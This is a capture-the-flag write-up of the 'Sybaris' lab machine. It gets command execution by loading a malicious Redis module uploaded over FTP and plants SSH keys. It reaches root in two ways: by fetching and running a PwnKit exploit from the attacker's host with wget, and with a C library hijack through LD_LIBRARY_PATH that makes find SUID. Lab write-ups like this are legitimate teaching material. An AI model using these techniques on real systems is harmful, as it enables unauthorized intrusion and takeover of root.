Security Analyst | Security Researcher | CRTP

Proving grounds Practice: Sybaris

Proving grounds Practice - Sybaris CTF writeup.

Nmap

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)
6379/tcp open  redis   Redis key-value store 5.0.9

21/tcp open ftp vsftpd 3.0.2

Anonymous login success No directory found

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)

Nothing here…

6379/tcp open redis Redis key-value store 5.0.9

Upload module.so file to the remote machine through the FTP. Use redis-cli to import the uploaded module for command execution

naveenj@hackerspace:[21:42]~/proving_grounds/Sybaris$ redis-cli -h 192.168.209.93
192.168.209.93:6379> MODULE LOAD /var/ftp/pub/exp.so
OK
192.168.209.93:6379> system.exe "id"
(error) ERR unknown command `system.exe`, with args beginning with: `id`, 
192.168.209.93:6379> module list
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
192.168.209.93:6379> system.exec "whoami;id;hostname;uname -a"
"pablo\nuid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\nsybaris\nLinux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"
  • Now copy id_rsa.pub file from the local machine to remote machine via ftp.

  • Run the copy command to copy /var/ftp/pub/authorized_keys to /home/pablo/.ssh/authorized_keys. Ensure the .ssh folder was created before copying the key.

  • Cross check the file using the redis-cli system.exec command and ssh to the user.

Privilege Escalation

Sudo version vulnerable to CVE-2021-4034 (pwnkit).

[pablo@sybaris tmp]$ wget http://192.168.45.174/CVE-2021-4034.py -O exploit.py
--2023-10-29 22:01:50--  http://192.168.45.174/CVE-2021-4034.py
Connecting to 192.168.45.174:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘exploit.py’

100%[===================================================================================================================================================>] 3,262       --.-K/s   in 0.003s  

2023-10-29 22:01:51 (1.09 MB/s) - ‘exploit.py’ saved [3262/3262]

[pablo@sybaris tmp]$ which python
/usr/bin/python
[pablo@sybaris tmp]$ python exploit.py 
[+] Creating shared library for exploit code.
[+] Calling execve()
[root@sybaris tmp]# cd /root
[root@sybaris root]#

Alternative

[pablo@sybaris ~]$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root       /usr/bin/log-sweeper

Abuse LD_LIBRARY_PATH

  • https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/

Exploit

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("chmod u+s /usr/bin/find");
}

Compile the exploit and run

gcc -o utils.so -shared -fPIC exploit.c

[pablo@sybaris tmp]$ ls -al /usr/bin/find
-rwsr-sr-x. 1 root root 199304 Oct 30  2018 /usr/bin/find   #SUID bit set
[pablo@sybaris tmp]$
[pablo@sybaris tmp]$ /usr/bin/find . -exec /bin/sh -p \; -quit

Note after running the exploit the SUID bit has been set to the binry find.

Root Obtained

For more updates and insights, follow me on Twitter: @thevillagehacker.